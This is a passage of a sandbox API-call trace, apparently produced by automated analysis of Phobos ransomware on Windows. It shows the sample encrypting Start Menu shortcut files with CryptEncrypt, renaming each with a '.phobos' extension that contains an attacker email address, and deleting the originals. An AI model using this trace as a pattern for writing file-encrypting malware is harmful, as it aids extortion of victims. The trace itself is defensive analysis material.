recorder.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.470] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.470] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.470] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x532, lpOverlapped=0x0) returned 1 [0176.478] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x540, dwBufLen=0x540 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x540) returned 1 [0176.478] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x540, lpOverlapped=0x0) returned 1 [0176.479] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.479] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.479] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.479] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.479] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.479] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.479] CloseHandle (hObject=0x188) returned 1 [0176.479] CloseHandle (hObject=0x14c) returned 1 [0176.480] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sound recorder.lnk")) returned 1 [0176.482] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.483] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1351) returned 1 [0176.483] CloseHandle (hObject=0x14c) returned 1 [0176.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk")) returned 0x20 [0176.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.483] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.484] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.484] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.484] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x547, lpOverlapped=0x0) returned 1 [0176.489] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x550, dwBufLen=0x550 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x550) returned 1 [0176.489] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x550, lpOverlapped=0x0) returned 1 [0176.490] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0176.490] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.490] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.490] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.490] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.491] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.491] CloseHandle (hObject=0x14c) returned 1 [0176.491] CloseHandle (hObject=0x188) returned 1 [0176.491] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sticky notes.lnk")) returned 1 [0176.493] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.493] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.493] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1254) returned 1 [0176.494] CloseHandle (hObject=0x188) returned 1 [0176.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk")) returned 0x20 [0176.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.494] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.494] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.494] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.495] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.495] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4e6, lpOverlapped=0x0) returned 1 [0176.576] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0) returned 1 [0176.576] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4f0, lpOverlapped=0x0) returned 1 [0176.577] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0176.577] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.577] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0176.577] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.577] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0176.578] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.578] CloseHandle (hObject=0x188) returned 1 [0176.578] CloseHandle (hObject=0x14c) returned 1 [0176.578] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\sync center.lnk")) returned 1 [0176.579] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.579] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.580] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1250) returned 1 [0176.580] CloseHandle (hObject=0x14c) returned 1 [0176.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk")) returned 0x20 [0176.580] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.580] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.580] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.581] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.581] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.581] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4e2, lpOverlapped=0x0) returned 1 [0176.639] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4f0) returned 1 [0176.639] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4f0, lpOverlapped=0x0) returned 1 [0176.640] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.640] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.640] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.640] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.640] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.640] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.640] CloseHandle (hObject=0x14c) returned 1 [0176.641] CloseHandle (hObject=0x188) returned 1 [0176.641] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\System Information.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\system information.lnk")) returned 1 [0176.642] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.642] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.642] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1268) returned 1 [0176.643] CloseHandle (hObject=0x188) returned 1 [0176.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk")) returned 0x20 [0176.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.678] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.678] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.679] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.679] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.679] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.679] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4f4, lpOverlapped=0x0) returned 1 [0176.696] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500, dwBufLen=0x500 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x500) returned 1 [0176.696] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x500, lpOverlapped=0x0) returned 1 [0176.697] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0176.697] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.697] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0176.697] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.697] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0176.697] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.697] CloseHandle (hObject=0x188) returned 1 [0176.697] CloseHandle (hObject=0x14c) returned 1 [0176.698] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Task Scheduler.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\task scheduler.lnk")) returned 1 [0176.699] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0176.699] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.700] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1316) returned 1 [0176.700] CloseHandle (hObject=0x14c) returned 1 [0176.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk")) returned 0x20 [0176.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.700] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.700] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.701] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0176.701] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\windows easy transfer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0176.701] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d28) returned 1 [0176.701] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.701] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x524, lpOverlapped=0x0) returned 1 [0176.740] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x530, dwBufLen=0x530 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x530) returned 1 [0176.740] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x530, lpOverlapped=0x0) returned 1 [0176.759] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0176.759] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0176.759] 